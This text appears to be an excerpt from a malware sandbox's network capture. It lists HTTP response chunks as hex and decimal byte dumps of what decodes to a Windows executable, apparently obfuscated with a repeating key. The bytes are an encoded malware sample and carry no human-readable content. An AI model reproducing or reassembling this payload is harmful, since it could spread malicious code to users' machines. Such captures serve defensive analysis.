                                                                                              Data Ascii: 77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116
                                                                                              2021-09-27 18:28:01 UTC3383INData Raw: 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 32 35 20 34 30 20 32 32 39 20 31 30 39 20 31 31 35 20 35 30 20 34 38 20 35 30 20 35 30 20 38 34 20 31 31 34 20 31 31 37 20 31 34 36 20 31 34 33 20 35 30 20 34 38 20 31 33 38 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 31 31 32 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34
                                                                                              Data Ascii: 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 25 40 229 109 115 50 48 50 50 84 114 117 146 143 50 48 138 54 84 114 117 109 112 50 112 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54
                                                                                              2021-09-27 18:28:01 UTC3384INData Raw: 38 20 32 34 35 20 35 35 20 38 34 20 31 31 34 20 38 35 20 31 30 39 20 31 31 32 20 35 30 20 32 34 38 20 35 31 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 31 38 20 35 34 20 38 34 20 31 38 20 39 31 20 33 31 20 32 31 20 39 34 20 39 35 20 38 31 20 35 34 20 38 34 20 31 32 36 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 30 39 20 31 31 32 20 32 34 38 20 34 39 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 35 33 20 31 30 39 20 31 31 32 20 31 31 32 20 33 30 20 36 34 20 36 39 20 33
                                                                                              Data Ascii: 8 245 55 84 114 85 109 112 50 248 51 54 84 112 117 109 112 50 48 50 54 84 114 117 109 112 50 48 18 54 84 18 91 31 21 94 95 81 54 84 126 117 109 112 50 48 48 54 84 112 117 109 112 248 49 50 54 84 114 117 109 112 50 48 50 54 84 114 53 109 112 112 30 64 69 3
                                                                                              2021-09-27 18:28:01 UTC3386INData Raw: 31 32 20 31 31 36 20 31 30 39 20 31 31 32 20 35 34 20 39 35 20 31 34 20 35 34 20 38 34 20 31 32 30 20 39 35 20 31 30 39 20 39 39 20 32 20 34 39 20 35 30 20 36 31 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 31 31 32 20 35 30 20 33 33 20 37 36 20 35 32 20 38 34 20 31 31 34 20 31 31 33 20 32 20 37 37 20 35 30 20 34 38 20 35 36 20 32 38 20 38 34 20 39 37 20 36 39 20 31 30 38 20 31 31 32 20 35 37 20 34 38 20 35 30 20 35 34 20 38 30 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 34 39 20 34 38 20 35 30 20 35 30 20 35 39 20 37 36 20 31 31 37 20 31 30 39 20 31 32 32 20 32 34 20 34 38 20 33 33 20 36 20 38 35 20 31 31 34 20 31 32 36 20 31 30 39 20 31 31 32 20 35 30 20 35 33 20 35 30 20 35 34 20 36 39 20 31 32 20 31 31 33 20 31 30 39 20 31 31 32 20 35 34 20 39
                                                                                              Data Ascii: 12 116 109 112 54 95 14 54 84 120 95 109 99 2 49 50 61 84 114 117 110 112 50 33 76 52 84 114 113 2 77 50 48 56 28 84 97 69 108 112 57 48 50 54 80 114 117 124 14 49 48 50 50 59 76 117 109 122 24 48 33 6 85 114 126 109 112 50 53 50 54 69 12 113 109 112 54 9
                                                                                              2021-09-27 18:28:01 UTC3387INData Raw: 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 31 30 32 20 31 39 31 20 31 35 35 20 35 30 20 35 34 20 38 35 20 39 30 20 36 31 20 31 30 39 20 31 31 32 20 35 36 20 36 37 20 31 32 33 20 35 34 20 38 34 20 31 32 30 20 31 35 20 33 30 20 35 38 20 35 30 20 34 38 20 35 36 20 33 35 20 31 32 31 20 31 31 33 20 38 33 20 37 30 20 31 31 39 20 31 37 38 20 35 36 20 35 30 20 35 34 20 38 30 20 38 39 20 31 31 37 20 31 39 20 31 32 30 20 35 30 20 34 38 20 35 34 20 32 33 30 20 39 32 20 31 31 34 20 31 31 37 20 31 31 38 20 38 38 20 31 31 36 20 34 38 20 35 30 20 36 30 20 36 34 20 32 39 20 36 32 20 31 30 39 20 31 31 32 20 35 36 20 32 34 20 35 34 20 35 34 20 38 34 20 38 39 20 31 31 30 20 36 34 20 31 31 38 20 32 30 20 32 33 37 20 37 38 20 35 34 20 38 34 20 31 31
                                                                                              Data Ascii: 44 30 171 114 117 107 102 191 155 50 54 85 90 61 109 112 56 67 123 54 84 120 15 30 58 50 48 56 35 121 113 83 70 119 178 56 50 54 80 89 117 19 120 50 48 54 230 92 114 117 118 88 116 48 50 60 64 29 62 109 112 56 24 54 54 84 89 110 64 118 20 237 78 54 84 11
                                                                                              2021-09-27 18:28:01 UTC3388INData Raw: 20 31 31 34 20 37 35 20 38 38 20 31 30 33 20 34 38 20 35 30 20 36 30 20 31 32 36 20 38 34 20 39 34 20 31 35 34 20 31 31 32 20 34 39 20 30 20 35 36 20 35 34 20 39 31 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 37 38 20 31 30 31 20 38 38 20 31 30 36 20 38 36 20 32 36 20 31 31 33 20 35 30 20 35 34 20 39 34 20 38 38 20 38 33 20 37 30 20 31 33 35 20 35 30 20 33 35 20 32 20 35 30 20 38 34 20 31 31 31 20 31 31 37 20 31 30 39 20 31 31 32 20 35 37 20 34 38 20 35 30 20 33 39 20 38 36 20 31 30 33 20 39 38 20 36 34 20 39 38 20 32 30 20 35 31 20 33 39 20 34 33 20 31 32 31 20 31 32 35 20 38 33 20 36 39 20 33 34 20 35 30 20 34 38 20 35 36 20 33 30 20 37 20 31 31 34 20 31 31 37 20 31 30 33 20 39 30 20 32 30 20 32 37 20 32 32 32
                                                                                              Data Ascii: 114 75 88 103 48 50 60 126 84 94 154 112 49 0 56 54 91 114 117 109 112 50 48 50 52 78 101 88 106 86 26 113 50 54 94 88 83 70 135 50 35 2 50 84 111 117 109 112 57 48 50 39 86 103 98 64 98 20 51 39 43 121 125 83 69 34 50 48 56 30 7 114 117 103 90 20 27 222
                                                                                              2021-09-27 18:28:01 UTC3390INData Raw: 35 30 20 35 39 20 33 37 20 31 31 37 20 31 30 39 20 31 32 32 20 32 36 20 33 37 20 35 31 20 35 34 20 38 32 20 31 31 32 20 39 39 20 32 34 37 20 34 20 35 36 20 34 38 20 35 30 20 34 35 20 37 34 20 39 35 20 31 32 37 20 37 35 20 31 34 20 35 20 34 38 20 35 30 20 35 30 20 31 32 30 20 39 36 20 39 34 20 31 31 30 20 31 32 32 20 32 35 20 31 39 36 20 37 36 20 30 20 38 34 20 31 31 34 20 31 31 33 20 31 30 37 20 38 38 20 31 30 34 20 34 39 20 35 30 20 34 38 20 31 32 31 20 31 31 38 20 39 38 20 31 30 32 20 39 31 20 34 38 20 33 38 20 35 37 20 34 39 20 31 32 34 20 31 30 39 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 33 35 20 32 20 35 33 20 38 34 20 36 31 20 31 31 37 20 31 30 39 20 31 31 32 20 33 34 20 34 38 20 35 30 20 33 39 20 38 36 20 31 30 30 20 32 33 39 20 32 30 20 36
                                                                                              Data Ascii: 50 59 37 117 109 122 26 37 51 54 82 112 99 247 4 56 48 50 45 74 95 127 75 14 5 48 50 50 120 96 94 110 122 25 196 76 0 84 114 113 107 88 104 49 50 48 121 118 98 102 91 48 38 57 49 124 109 117 109 118 24 35 2 53 84 61 117 109 112 34 48 50 39 86 100 239 20 6
                                                                                              2021-09-27 18:28:01 UTC3391INData Raw: 31 38 20 37 36 20 31 30 20 35 30 20 35 34 20 38 30 20 32 39 20 34 33 20 31 30 39 20 31 31 32 20 35 36 20 33 35 20 35 37 20 31 34 20 31 39 38 20 31 31 34 20 31 31 37 20 31 30 39 20 39 38 20 35 37 20 32 34 20 31 30 39 20 35 34 20 38 34 20 31 32 30 20 31 30 32 20 31 30 36 20 31 31 38 20 33 35 20 35 35 20 37 33 20 33 39 20 38 34 20 31 31 34 20 31 31 33 20 32 20 31 36 20 35 30 20 34 38 20 35 36 20 32 36 20 38 31 20 37 34 20 30 20 31 30 39 20 31 31 32 20 35 30 20 33 39 20 31 37 38 20 36 33 20 38 34 20 31 31 34 20 31 31 33 20 37 37 20 32 30 38 20 32 35 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 39 37 20 35 33 20 37 35 20 33 35 20 35 34 20 38 34 20 31 31 38 20 32 34 39 20 33 37 20 31 31 32 20 35 30 20 34 39 20 32 36 20 31 30
                                                                                              Data Ascii: 18 76 10 50 54 80 29 43 109 112 56 35 57 14 198 114 117 109 98 57 24 109 54 84 120 102 106 118 35 55 73 39 84 114 113 2 16 50 48 56 26 81 74 0 109 112 50 39 178 63 84 114 113 77 208 25 224 44 30 171 114 117 107 97 53 75 35 54 84 118 249 37 112 50 49 26 10
                                                                                              2021-09-27 18:28:01 UTC3392INData Raw: 31 32 38 20 35 37 20 32 37 20 31 39 35 20 36 39 20 31 32 30 20 31 31 34 20 31 31 37 20 31 30 37 20 31 32 34 20 35 38 20 35 30 20 35 33 20 31 37 32 20 34 35 20 35 38 20 31 31 37 20 31 30 39 20 31 31 33 20 36 37 20 31 32 30 20 35 30 20 35 34 20 38 35 20 31 35 20 31 30 30 20 31 30 39 20 31 31 32 20 35 34 20 35 36 20 34 38 20 34 39 20 36 37 20 34 32 20 32 33 39 20 32 30 20 36 36 20 35 30 20 34 38 20 35 31 20 37 31 20 31 30 32 20 31 31 34 20 31 31 37 20 31 30 38 20 31 33 20 36 31 20 34 38 20 35 30 20 35 30 20 39 32 20 31 31 32 20 31 31 34 20 31 31 37 20 34 30 20 31 36 38 20 36 38 20 31 35 33 20 35 34 20 38 34 20 31 31 35 20 38 20 31 32 35 20 31 31 32 20 35 30 20 35 32 20 35 38 20 35 32 20 38 33 20 31 30 37 20 34 35 20 32 34 37 20 39 20 31 38 20 34 38 20 35 30
                                                                                              Data Ascii: 128 57 27 195 69 120 114 117 107 124 58 50 53 172 45 58 117 109 113 67 120 50 54 85 15 100 109 112 54 56 48 49 67 42 239 20 66 50 48 51 71 102 114 117 108 13 61 48 50 50 92 112 114 117 40 168 68 153 54 84 115 8 125 112 50 52 58 52 83 107 45 247 9 18 48 50
                                                                                              2021-09-27 18:28:01 UTC3394INData Raw: 33 20 36 39 20 31 30 30 20 31 31 32 20 32 35 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 34 39 20 34 34 20 33 31 20 33 39 20 31 31 34 20 38 34 20 31 31 39 20 31 30 35 20 31 30 33 20 33 31 20 33 33 20 32 30 20 31 36 20 38 36 20 31 31 39 20 39 38 20 36 34 20 39 37 20 32 30 20 32 32 20 32 34 20 37 35 20 39 35 20 31 31 34 20 31 31 37 20 31 30 35 20 39 31 20 32 31 36 20 37 37 20 36 32 20 35 34 20 38 34 20 31 31 38 20 39 34 20 31 33 35 20 31 33 20 36 33 20 34 38 20 35 30 20 35 30 20 31 32 37 20 31 35 32 20 31 31 37 20 31 32 36 20 36 34 20 35 32 20 34 38 20 31 38 31 20 35 34 20 38 34 20 31 31 34 20 39 37 20 31 30 39 20 31 31 32 20 33 35 20 35 30 20 33 37 20 31 36 37 20 36 36 20 39 34 20 39 34 20 37 35 20 31 31 35 20 31
                                                                                              Data Ascii: 3 69 100 112 25 48 50 54 84 114 117 109 114 49 44 31 39 114 84 119 105 103 31 33 20 16 86 119 98 64 97 20 22 24 75 95 114 117 105 91 216 77 62 54 84 118 94 135 13 63 48 50 50 127 152 117 126 64 52 48 181 54 84 114 97 109 112 35 50 37 167 66 94 94 75 115 1
                                                                                              2021-09-27 18:28:01 UTC3395INData Raw: 31 20 31 30 32 20 33 39 20 32 39 20 33 32 20 31 36 20 34 37 20 31 30 36 20 31 31 37 20 31 30 39 20 31 31 36 20 34 39 20 34 35 20 33 36 20 32 36 20 39 34 20 38 34 20 32 36 20 35 20 31 31 32 20 35 30 20 35 38 20 32 34 20 31 36 20 31 32 37 20 31 35 38 20 38 33 20 37 30 20 31 33 32 20 34 39 20 30 20 35 36 20 35 34 20 31 30 30 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 37 36 20 31 30 34 20 38 38 20 31 30 33 20 38 36 20 37 33 20 34 30 20 35 30 20 35 34 20 38 30 20 39 35 20 31 31 35 20 37 30 20 31 31 35 20 32 30 20 32 37 20 31 39 38 20 32 38 20 38 36 20 31 31 31 20 31 30 35 20 36 34 20 39 38 20 32 30 20 37 35 20 34 32 20 35 34 20 38 34 20 31 31 38 20 31 31 38 20 31 32 30 20 31 30 36 20 33 31 20 35 38 20 32 30 20 38 39
                                                                                              Data Ascii: 1 102 39 29 32 16 47 106 117 109 116 49 45 36 26 94 84 26 5 112 50 58 24 16 127 158 83 70 132 49 0 56 54 100 114 117 109 112 50 48 50 52 76 104 88 103 86 73 40 50 54 80 95 115 70 115 20 27 198 28 86 111 105 64 98 20 75 42 54 84 118 118 120 106 31 58 20 89
                                                                                              2021-09-27 18:28:01 UTC3396INData Raw: 39 34 20 31 35 33 20 39 30 20 34 38 20 34 32 20 33 37 20 32 37 20 37 31 20 38 34 20 31 34 20 31 31 36 20 31 31 32 20 35 30 20 35 32 20 34 39 20 34 30 20 37 37 20 39 35 20 31 32 36 20 37 35 20 31 31 36 20 39 33 20 39 35 20 35 30 20 35 34 20 39 34 20 38 38 20 38 33 20 37 30 20 31 35 35 20 32 30 20 32 37 20 31 39 33 20 35 34 20 38 34 20 31 31 34 20 31 31 38 20 39 33 20 31 32 32 20 35 30 20 32 33 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 34 38 20 34 33 20 34 33 20 32 37 20 39 34 20 38 34 20 31 34 20 31 31 39 20 31 31 32 20 35 30 20 35 32 20 33 31 20 34 38 20 31 32 37 20 31 31 33 20 38 33 20 37 30 20 31 33 32 20 32 34 20 35 30 20 34 32 20 34 32 20 31 32 31 20 31 32 36 20 38 33 20 32 32 20 31 30 36 20 35 30 20 34 38 20 35 34
                                                                                              Data Ascii: 94 153 90 48 42 37 27 71 84 14 116 112 50 52 49 40 77 95 126 75 116 93 95 50 54 94 88 83 70 155 20 27 193 54 84 114 118 93 122 50 23 50 54 84 114 117 109 112 48 43 43 27 94 84 14 119 112 50 52 31 48 127 113 83 70 132 24 50 42 42 121 126 83 22 106 50 48 54
                                                                                              2021-09-27 18:28:01 UTC3398INData Raw: 20 31 31 37 20 31 30 37 20 31 31 36 20 33 36 20 34 32 20 34 38 20 37 37 20 37 39 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 20 33 36 20 34 38 20 35 30 20 35 30 20 38 31 20 39 30 20 31 39 34 20 31 30 39 20 31 31 32 20 35 32 20 32 36 20 35 30 20 35 34 20 38 34 20 31 31 33 20 36 39 20 31 30 33 20 31 31 32 20 36 31 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 35 20 34 36 20 34 33 20 33 31 20 34 39 20 31 31 34 20 39 30 20 32 33 35 20 31 30 39 20 31 31 32 20 35 32 20 32 36 20 32 30 20 32 39 20 31 36 33 20 31 31 34 20 31 31 31 20 36 39 20 32 33 37 20 35 30 20 34 38 20 35 32 20 32 38 20 38 34 20 39 37 20 36 39 20 31 30 35 20 31 31 32 20 31 36 39 20 34 38 20 35 30 20 35 34 20 37 36 20 31 31 34 20 31 31 37 20 31 32 34 20 31 30
                                                                                              Data Ascii: 117 107 116 36 42 48 77 79 114 117 105 11 36 48 50 50 81 90 194 109 112 52 26 50 54 84 113 69 103 112 61 48 50 54 84 114 117 109 115 46 43 31 49 114 90 235 109 112 52 26 20 29 163 114 111 69 237 50 48 52 28 84 97 69 105 112 169 48 50 54 76 114 117 124 10
                                                                                              2021-09-27 18:28:01 UTC3399INData Raw: 35 37 20 32 33 38 20 34 36 20 35 38 20 31 32 37 20 31 38 39 20 31 32 30 20 37 30 20 31 36 36 20 37 39 20 31 38 34 20 35 30 20 35 34 20 38 30 20 38 39 20 31 36 39 20 36 39 20 36 30 20 35 30 20 34 38 20 35 36 20 33 39 20 38 30 20 31 32 31 20 39 33 20 31 32 20 31 31 32 20 35 30 20 35 38 20 32 33 36 20 35 34 20 38 33 20 38 38 20 31 30 39 20 31 38 39 20 31 31 33 20 33 34 20 34 38 20 35 30 20 35 34 20 38 34 20 31 32 32 20 31 31 37 20 34 30 20 36 31 20 35 30 20 36 33 20 31 31 36 20 35 34 20 38 34 20 31 31 35 20 31 30 32 20 39 33 20 31 31 36 20 35 30 20 39 36 20 35 30 20 35 34 20 38 34 20 31 30 35 20 31 31 37 20 31 30 39 20 39 37 20 34 38 20 36 37 20 37 32 20 35 34 20 38 34 20 31 32 30 20 31 31 30 20 36 34 20 31 32 33 20 32 30 20 35 35 20 39 33 20 37 35 20 38 34
                                                                                              Data Ascii: 57 238 46 58 127 189 120 70 166 79 184 50 54 80 89 169 69 60 50 48 56 39 80 121 93 12 112 50 58 236 54 83 88 109 189 113 34 48 50 54 84 122 117 40 61 50 63 116 54 84 115 102 93 116 50 96 50 54 84 105 117 109 97 48 67 72 54 84 120 110 64 123 20 55 93 75 84
                                                                                              2021-09-27 18:28:01 UTC3400INData Raw: 39 31 20 32 31 31 20 35 38 20 32 35 20 32 31 38 20 36 39 20 31 31 39 20 32 36 20 32 33 37 20 31 31 32 20 35 30 20 35 38 20 35 38 20 39 32 20 31 33 20 31 31 36 20 32 35 31 20 32 31 38 20 32 36 20 32 36 20 37 31 20 35 30 20 35 34 20 39 34 20 32 37 20 31 30 32 20 31 30 37 20 39 37 20 35 35 20 35 34 20 35 38 20 33 39 20 38 32 20 32 39 20 32 34 37 20 31 30 39 20 31 31 32 20 35 36 20 36 31 20 35 38 20 36 33 20 31 32 20 31 32 36 20 31 32 35 20 31 30 37 20 32 35 34 20 31 33 33 20 33 20 32 33 30 20 33 39 20 38 31 20 32 39 20 31 32 20 31 30 39 20 31 31 32 20 35 36 20 35 34 20 32 34 20 33 37 20 31 30 30 20 31 31 39 20 31 31 37 20 36 39 20 31 31 32 20 35 30 20 34 38 20 34 35 20 35 34 20 38 34 20 39 39 20 31 31 39 20 31 31 36 20 31 30 34 20 36 35 20 37 30 20 35 30 20
                                                                                              Data Ascii: 91 211 58 25 218 69 119 26 237 112 50 58 58 92 13 116 251 218 26 26 71 50 54 94 27 102 107 97 55 54 58 39 82 29 247 109 112 56 61 58 63 12 126 125 107 254 133 3 230 39 81 29 12 109 112 56 54 24 37 100 119 117 69 112 50 48 45 54 84 99 119 116 104 65 70 50
                                                                                              2021-09-27 18:28:01 UTC3402INData Raw: 31 20 32 30 20 32 39 20 31 37 33 20 31 31 32 20 39 38 20 31 31 32 20 39 33 20 35 38 20 32 32 20 39 33 20 31 32 31 20 38 34 20 31 31 34 20 31 31 35 20 37 30 20 39 39 20 32 30 20 32 37 20 31 39 36 20 35 32 20 37 39 20 31 30 30 20 38 39 20 31 30 31 20 38 36 20 39 33 20 39 36 20 35 30 20 35 34 20 38 32 20 38 39 20 31 31 38 20 37 35 20 39 31 20 31 39 36 20 32 36 20 35 30 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 39 31 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 20 32 33 20 34 38 20 35 30 20 35 30 20 31 32 30 20 31 31 35 20 39 35 20 31 31 31 20 31 30 33 20 33 36 20 32 38 20 33 36 20 31 36 20 31 31 34 20 31 31 32 20 31 34 20 37 35 20 31 31 32 20 35 30 20 35 32 20 33 36 20 35 32 20 34 37 20 38 36 20 31 31
                                                                                              Data Ascii: 1 20 29 173 112 98 112 93 58 22 93 121 84 114 115 70 99 20 27 196 52 79 100 89 101 86 93 96 50 54 82 89 118 75 91 196 26 50 54 87 66 124 109 91 50 48 50 54 84 114 117 111 11 23 48 50 50 120 115 95 111 103 36 28 36 16 114 112 14 75 112 50 52 36 52 47 86 11
                                                                                              2021-09-27 18:28:01 UTC3403INData Raw: 20 38 34 20 31 31 34 20 31 31 37 20 37 39 20 31 31 32 20 35 30 20 33 33 20 34 38 20 37 37 20 31 32 35 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 35 20 33 31 20 35 37 20 32 30 20 34 38 20 31 32 34 20 32 35 31 20 31 31 37 20 31 30 39 20 31 32 32 20 32 35 20 35 31 20 35 36 20 32 39 20 31 36 31 20 31 31 32 20 31 34 20 36 38 20 31 31 32 20 35 30 20 35 32 20 34 39 20 38 39 20 32 31 36 20 31 31 34 20 31 31 37 20 31 30 33 20 39 32 20 32 39 20 35 30 20 37 33 20 33 31 20 38 34 20 31 31 34 20 31 31 33 20 31 31 30 20 33 31 20 31 39 31 20 34 38 20 35 30 20 36 30 20 38 30 20 39 30 20 33 39 20 31 30 39 20 31 31 32 20 35 36 20 39 35 20 39 37 20 35 34 20 38 34 20 31 32 30 20 38 39 20 31 31 31 20 31 37 34 20 31 31 33 20 35 30 20 37 33 20 33 31 20 38 34 20 31 31 34 20 31
                                                                                              Data Ascii: 84 114 117 79 112 50 33 48 77 125 114 117 105 105 31 57 20 48 124 251 117 109 122 25 51 56 29 161 112 14 68 112 50 52 49 89 216 114 117 103 92 29 50 73 31 84 114 113 110 31 191 48 50 60 80 90 39 109 112 56 95 97 54 84 120 89 111 174 113 50 73 31 84 114 1
                                                                                              2021-09-27 18:28:01 UTC3405INData Raw: 39 33 20 31 36 34 20 38 34 20 31 31 34 20 31 32 37 20 31 31 32 20 39 33 20 35 32 20 32 32 20 32 35 20 31 32 20 38 38 20 38 39 20 31 35 33 20 31 30 32 20 39 31 20 32 30 32 20 35 36 20 33 32 20 34 38 20 37 30 20 31 31 35 20 39 33 20 32 35 34 20 31 31 32 20 35 30 20 35 38 20 33 33 20 35 30 20 37 30 20 31 31 38 20 39 33 20 32 34 39 20 31 31 32 20 35 30 20 35 38 20 33 32 20 35 35 20 31 32 34 20 32 32 35 20 31 31 37 20 31 30 39 20 31 32 32 20 33 33 20 35 33 20 33 32 20 35 31 20 31 32 34 20 32 33 31 20 31 31 37 20 31 30 39 20 31 32 32 20 32 36 20 39 38 20 35 30 20 35 34 20 39 34 20 39 30 20 32 32 37 20 31 30 39 20 31 31 32 20 35 36 20 33 33 20 35 32 20 38 39 20 31 39 35 20 31 31 34 20 31 31 37 20 31 30 33 20 39 38 20 35 31 20 32 34 20 31 37 30 20 35 34 20 38 34
                                                                                              Data Ascii: 93 164 84 114 127 112 93 52 22 25 12 88 89 153 102 91 202 56 32 48 70 115 93 254 112 50 58 33 50 70 118 93 249 112 50 58 32 55 124 225 117 109 122 33 53 32 51 124 231 117 109 122 26 98 50 54 94 90 227 109 112 56 33 52 89 195 114 117 103 98 51 24 170 54 84
                                                                                              2021-09-27 18:28:01 UTC3406INData Raw: 32 36 20 37 33 20 35 30 20 35 34 20 38 32 20 39 30 20 31 34 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 37 38 20 35 34 20 38 34 20 31 31 36 20 39 33 20 31 35 20 31 31 32 20 35 30 20 35 34 20 32 36 20 38 32 20 38 34 20 31 31 34 20 31 31 35 20 31 39 20 37 31 20 35 30 20 34 38 20 35 34 20 32 36 20 39 34 20 39 30 20 31 38 20 31 30 39 20 31 31 32 20 35 32 20 32 34 20 38 34 20 35 34 20 38 34 20 31 31 36 20 39 33 20 32 34 30 20 31 31 32 20 35 30 20 35 34 20 32 36 20 31 30 35 20 38 34 20 31 31 34 20 31 31 35 20 36 39 20 32 35 30 20 35 30 20 34 38 20 35 32 20 32 38 20 38 34 20 31 31 34 20 31 31 37 20 31 31 30 20 36 34 20 35 34 20 34 38 20 37 37 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 32 34 20 31 38 33 20 35 34 20 38 34 20 31
                                                                                              Data Ascii: 26 73 50 54 82 90 14 109 112 52 24 78 54 84 116 93 15 112 50 54 26 82 84 114 115 19 71 50 48 54 26 94 90 18 109 112 52 24 84 54 84 116 93 240 112 50 54 26 105 84 114 115 69 250 50 48 52 28 84 114 117 110 64 54 48 77 54 84 114 117 109 112 50 24 183 54 84 1
                                                                                              2021-09-27 18:28:01 UTC3407INData Raw: 33 20 38 35 20 31 37 20 32 30 35 20 32 30 37 20 32 30 35 20 35 34 20 37 39 20 36 36 20 31 31 33 20 31 30 39 20 33 20 35 30 20 34 38 20 35 30 20 31 37 20 38 34 20 31 31 34 20 31 30 30 20 37 37 20 33 34 20 31 38 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 33 35 20 34 38 20 35 30 20 34 38 20 34 32 20 36 34 20 31 31 37 20 31 30 39 20 31 31 36 20 39 33 20 31 36 32 20 35 30 20 35 34 20 39 34 20 31 30 36 20 38 38 20 31 31 30 20 38 36 20 32 35 20 31 30 20 35 37 20 32 39 20 31 37 35 20 39 36 20 31 31 36 20 36 39 20 32 32 37 20 35 30 20 34 38 20 35 36 20 34 34 20 31 32 31 20 38 38 20 38 33 20 37 37 20 32 20 31 38 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 39 38 20 35 30 20 32 34
                                                                                              Data Ascii: 3 85 17 205 207 205 54 79 66 113 109 3 50 48 50 17 84 114 100 77 34 18 224 44 30 171 114 117 107 88 135 48 50 48 42 64 117 109 116 93 162 50 54 94 106 88 110 86 25 10 57 29 175 96 116 69 227 50 48 56 44 121 88 83 77 2 18 224 44 30 171 114 117 107 98 50 24
                                                                                              2021-09-27 18:28:01 UTC3409INData Raw: 20 33 31 20 32 30 39 20 32 33 36 20 36 20 37 30 20 31 32 31 20 31 33 39 20 31 32 33 20 31 30 34 20 35 30 20 34 38 20 34 31 20 38 39 20 35 35 20 31 31 34 20 31 31 37 20 31 30 33 20 31 37 32 20 32 33 36 20 31 36 20 32 33 20 33 30 20 32 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 39 20 35 33 20 33 33 20 35 33 20 32 32 20 36 34 20 38 32 20 31 36 35 20 31 31 35 20 38 38 20 32 30 35 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 38 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 38 31 20 35 30 20 35 34 20 39 34 20 31 37 32 20 31 31 37 20 37 31 20 31 30 33 20 33 37 20 34 39 20 32 36 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 39 20 31 31 32 20 31 31 32 20 32 34 30 20 35 30 20 35 36 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 34 20 35 30 20 32 35
                                                                                              Data Ascii: 31 209 236 6 70 121 139 123 104 50 48 41 89 55 114 117 103 172 236 16 23 30 24 114 117 103 99 53 33 53 22 64 82 165 115 88 205 48 50 48 124 198 117 109 118 26 81 50 54 94 172 117 71 103 37 49 26 54 84 112 117 19 112 112 240 50 56 84 114 117 109 114 50 25
                                                                                              2021-09-27 18:28:01 UTC3410INData Raw: 37 39 20 32 34 32 20 36 36 20 31 30 39 20 31 31 32 20 35 34 20 37 38 20 35 20 35 34 20 38 34 20 31 31 38 20 39 33 20 31 33 20 31 31 33 20 35 30 20 35 34 20 31 37 38 20 30 20 38 34 20 31 31 34 20 31 31 33 20 31 31 37 20 31 32 31 20 31 38 38 20 31 33 35 20 33 37 20 31 31 31 20 37 31 20 31 31 37 20 31 30 32 20 31 30 35 20 37 32 20 32 31 36 20 34 38 20 35 30 20 35 34 20 37 30 20 31 31 39 20 31 33 39 20 31 32 30 20 39 36 20 35 30 20 34 38 20 34 38 20 33 36 20 38 31 20 31 32 33 20 31 30 30 20 31 30 35 20 32 33 34 20 37 35 20 31 32 30 20 35 30 20 35 34 20 38 35 20 33 20 36 31 20 31 30 39 20 31 31 32 20 35 31 20 37 37 20 34 35 20 35 34 20 38 34 20 31 31 38 20 31 30 33 20 31 30 34 20 31 32 31 20 33 35 20 35 32 20 33 37 20 31 31 30 20 32 30 36 20 31 31 20 37 31 20
